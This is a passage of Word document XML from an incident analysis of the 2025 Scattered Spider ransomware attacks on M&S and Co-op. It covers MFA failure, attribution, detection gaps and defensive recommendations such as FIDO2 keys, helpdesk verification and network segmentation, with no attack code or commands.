        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>, establishment of new privileged accounts or abnormal use of RMM tools. By comparison, Co-op's Security Operations Centre (SOC) detected and alerted on unusual account activity within minutes of the intruder breaching the network, prompting an incident response. This suggests M&amp;S did not have sufficient User and Entity Behaviour Analytics (UEBA) or alert thresholds were set too low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48E365" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc227971076"/>
      <w:bookmarkStart w:id="24" w:name="_Toc228127106"/>
      <w:r>
        <w:t>3.5 MFA Control Failure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="10484860" w14:textId="6AEB0576" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>Scattered Spider's signature technique, bypassing MFA through helpdesk social engineering, was successful at M&amp;S because the company's MFA policy permitted device registration or factor resets via a human process without phishing-resistant MFA (e.g., FIDO2/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>WebAuthn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> hardware keys). CISA (AA23-320A rev., 2025) explicitly highlights that MFA technologies such as SMS and push notifications are vulnerable to social engineering and SIM-swapping attacks, and should be replaced with phishing-resistant hardware-based MFA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C69A2" w14:textId="0F3E8817" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="009013F4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="_Toc227971077"/>
      <w:bookmarkStart w:id="26" w:name="_Toc228127107"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Threat Actor Profile and Motive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="6F3D4876" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc227971078"/>
      <w:bookmarkStart w:id="28" w:name="_Toc228127108"/>
      <w:r>
        <w:t>4.1 Attribution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1D11C431" w14:textId="387A3E31" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">We have high confidence in attributing the attacks to Scattered Spider. It is tracked under a number of different aliases - UNC3944 (Mandiant), Octo Tempest (Microsoft), Storm-0875, Roasted 0ktapus - and is characterised as a loosely organised group of mostly native English speakers in their early to mid-20s who have been active since at least May 2022 (MITRE ATT&amp;CK G1015; CISA, 2025). The impersonation of a helpdesk via voice phishing, and the employment of legitimate remote management and monitoring (RMM) software and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> RaaS encryptor after gaining access, is consistent with the threat actor profile update published in the joint CISA/FBI/NCSC/ACSC advisory in July 2025. M&amp;S' chairman Archie Norman's evidence to parliament that "the hackers impersonated an employee and tricked a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>third party</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> supplier into changing the passwords" is textually compatible with this attribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA03FE0" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc227971079"/>
      <w:bookmarkStart w:id="30" w:name="_Toc228127109"/>
      <w:r>
        <w:t>4.2 Motive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="17BF576F" w14:textId="3A90093D" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">The main motive is money. Scattered Spider is a double-extortion ransomware group: pay a ransom to recover the data and pay another ransom to prevent exfiltrated data from being sold on. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> ransom note to M&amp;S CEO, Stuart Machin, reported in early June (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>BlackFog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>, 2025), is in line with this approach. There is no evidence of state sponsorship, espionage or political motives. The UK Cyber Monitoring Centre has assessed the total M&amp;S/Co-op campaign as a Category 2 cyber incident, with total costs estimated to be between £270 m and £440 m (Computer Weekly, Jun 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2289F5BF" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc227971080"/>
      <w:bookmarkStart w:id="32" w:name="_Toc228127110"/>
      <w:r>
        <w:t>4.3 Capability Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="21A5719C" w14:textId="37236262" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">The group's capabilities are assessed as moderate-to-high level social engineering and operational security skills, but using off-the-shelf tools rather than zero-day exploits. They are highly patient (8 weeks in M&amp;S's environment), proficient in language and cultural skills to convincingly impersonate others, and highly knowledgeable about enterprise Active Directory and VMware virtualisation environments. Mandiant (2025) observes the group using increasingly frequent targeting of VMware vSphere environments, a strategic escalation of their attacks' impact. The APT group continually evolves its TTPs to evade detection (CISA, 2025) and - uniquely - reportedly tapped M&amp;S's incident response </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> calls to predict response actions (CISA AA23-320A rev., 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304439D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2C4FD" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc227971081"/>
      <w:bookmarkStart w:id="34" w:name="_Toc228127111"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. Detection and Response Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="406BE76A" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc227971082"/>
      <w:bookmarkStart w:id="36" w:name="_Toc228127112"/>
      <w:r>
        <w:t>5.1 M&amp;S — Detection Failure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="43884824" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">M&amp;S had a failure to detect. The eight-week detection failure after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exfiltration in February 2025 is a crucial failure of multiple monitoring aspects. There were no alarms for: (a) the unusual exfiltration of a highly sensitive Domain Controller database file; (b) the creation of new privileged access accounts outside the usual provisioning processes; (c) the unusual VPN logins from new MFA devices; and (d) the activation of RMM tools or commands in production environments outside scheduled change windows. This is indicative of either a poorly resourced SIEM/UEBA capability, or poorly configured detection content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCA675" w14:textId="5E445409" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>M&amp;S had reportedly tripled cybersecurity staff and doubled investment over the past few years (MTI.com, 2025). Yet, Norman's testimony implied that controls investment had not been met with commensurate detection success. This is not an uncommon claim: Verizon DBIR (2024) reports consistently that the median dwell time for financially motivated threat actors remains at weeks, implying detection is not as successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561AC625" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc227971083"/>
      <w:bookmarkStart w:id="38" w:name="_Toc228127113"/>
      <w:r>
        <w:t>5.2 Co-op — Detection Success</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="5C306C01" w14:textId="28F05952" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>Co-op's actions are in contrast. The SOC detected unusual behaviour of an account several minutes after the attacker's initial access and automatically locked the account before the attacker could move around the network. This was complemented by: (a) board and technical-level cyber incident simulations and crisis simulations; (b) micro-segmentation of the network to contain the fallout; and (c) pre-determined runbooks that did not need to be improvised in the midst of crisis. Suspension of VPN access to all staff, whilst disruptive, is an example of a balanced approach to incident response - security vs availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC5826" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc227971084"/>
      <w:bookmarkStart w:id="40" w:name="_Toc228127114"/>
      <w:r>
        <w:t>5.3 Third-Party Response</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="16BE9854" w14:textId="0673E19F" w:rsidR="00E81640" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009013F4">
        <w:t>The National Cyber Security Centre, Metropolitan Police and National Crime Agency responded promptly to public disclosure. The follow-up, joint CISA/NCSC advisory (Jul 2025) provided valuable threat intelligence to the industry. But the timing of these responses (weeks or months after compromise) highlights the relative limitations of the reactive, disclosure-driven government response, as opposed to proactive threat sharing by the industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E67EEC" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FE440" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc227971085"/>
      <w:bookmarkStart w:id="42" w:name="_Toc228127115"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. Strategic Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="6A042DC9" w14:textId="027BFCDB" w:rsidR="00E81640" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009013F4">
        <w:t>The following ranked recommendations are derived from the NCSC Cyber Essentials Plus, NIST SP 800-63B (digital identity), NIST SP 800-207 (zero trust) and incident response peer-reviewed articles. Effort bands are indicative:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D5D40" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41CF22F0" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc227971086"/>
      <w:bookmarkStart w:id="44" w:name="_Toc228127116"/>
      <w:r>
        <w:t>6.1 Deploy Phishing-Resistant MFA Across All Privileged Accounts [HIGH PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="427C1DFD" w14:textId="171808DE" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The campaign was a success because SMS/push-notification MFA could be circumvented through helpdesk social engineering. FIDO2/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>WebAuthn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> hardware keys (a.k.a. "security keys" - e.g., YubiKey) are phishing-resistant, SIM-swapping-proof and helpdesk-resistant because physical possession of the token is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9753B8" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: Mandate FIDO2-compliant authenticators for all privileged accounts (Domain Admins, cloud IAM, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> management) within 90 days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E738764" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Action: Extend to all workforce accounts within 12 months, particularly for remote-access and helpdesk portals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E0775" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Effort/Cost: Medium — hardware token procurement (~£30–£60 per user) plus policy uplift. For 65,000 M&amp;S employees, estimated £2–4 m one-time capital investment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810DE5B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Standard: Aligns with NCSC Authentication guidance; NIST SP 800-63B Level 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F3481" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFE24D6" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc227971087"/>
      <w:bookmarkStart w:id="46" w:name="_Toc228127117"/>
      <w:r>
        <w:t>6.2 Enforce Identity-Verified Helpdesk Authentication Protocols [HIGH PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="43D7F5C4" w14:textId="573B75CF" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers used a social engineering phone call to the helpdesk. There should be no password or MFA reset without an out-of-band identity verification process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC39BE" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Action: Implement a 'zero-trust helpdesk' protocol: any credential or MFA reset request must be approved by the employee's line manager via a separate authenticated channel (e.g., a manager portal) before action is taken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D400A30" w14:textId="2851B1EE" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Add this requirement as part of a security contract to all managed service provider (MSP) agreements, with audit rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD396F2" w14:textId="3D7B769A" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Effort/Cost: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Low-Medium effort/cost - process/policy change; tooling may need customisation of helpdesk workflows (1-3 months)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52B501" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF6C134" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc227971088"/>
      <w:bookmarkStart w:id="48" w:name="_Toc228127118"/>
      <w:r>
        <w:t>6.3 Implement Network Micro-Segmentation and Zero Trust Architecture [HIGH PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="545EB990" w14:textId="2032C488" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Co-op's result was due to network segmentation preventing east-west movement. NIST SP 800-207 (Zero Trust Architecture) is the definitive guide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5101A2B4" w14:textId="42442F40" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Map existing network and determine "flat" Layer 2/3 segments that allow free east-west travel. Segmentation of: (a) VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/vSphere management plane; (b) Active Directory Domain Controllers; (c) backup infrastructure; (d) point-of-sale and logistics systems should be prioritised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBA19E" w14:textId="55CA98D3" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Introduce a software-defined networking (SDN) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>microsegmentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> solution (e.g., VMware NSX, Illumio, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Guardicore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) for least-privilege east-west access policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D03F628" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Effort/Cost: High — architectural redesign is a 12–</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>24 month</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> programme for a network of M&amp;S's scale. Estimated £5–15 m for an organisation of 65,000 staff across 1,400 sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C070225" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
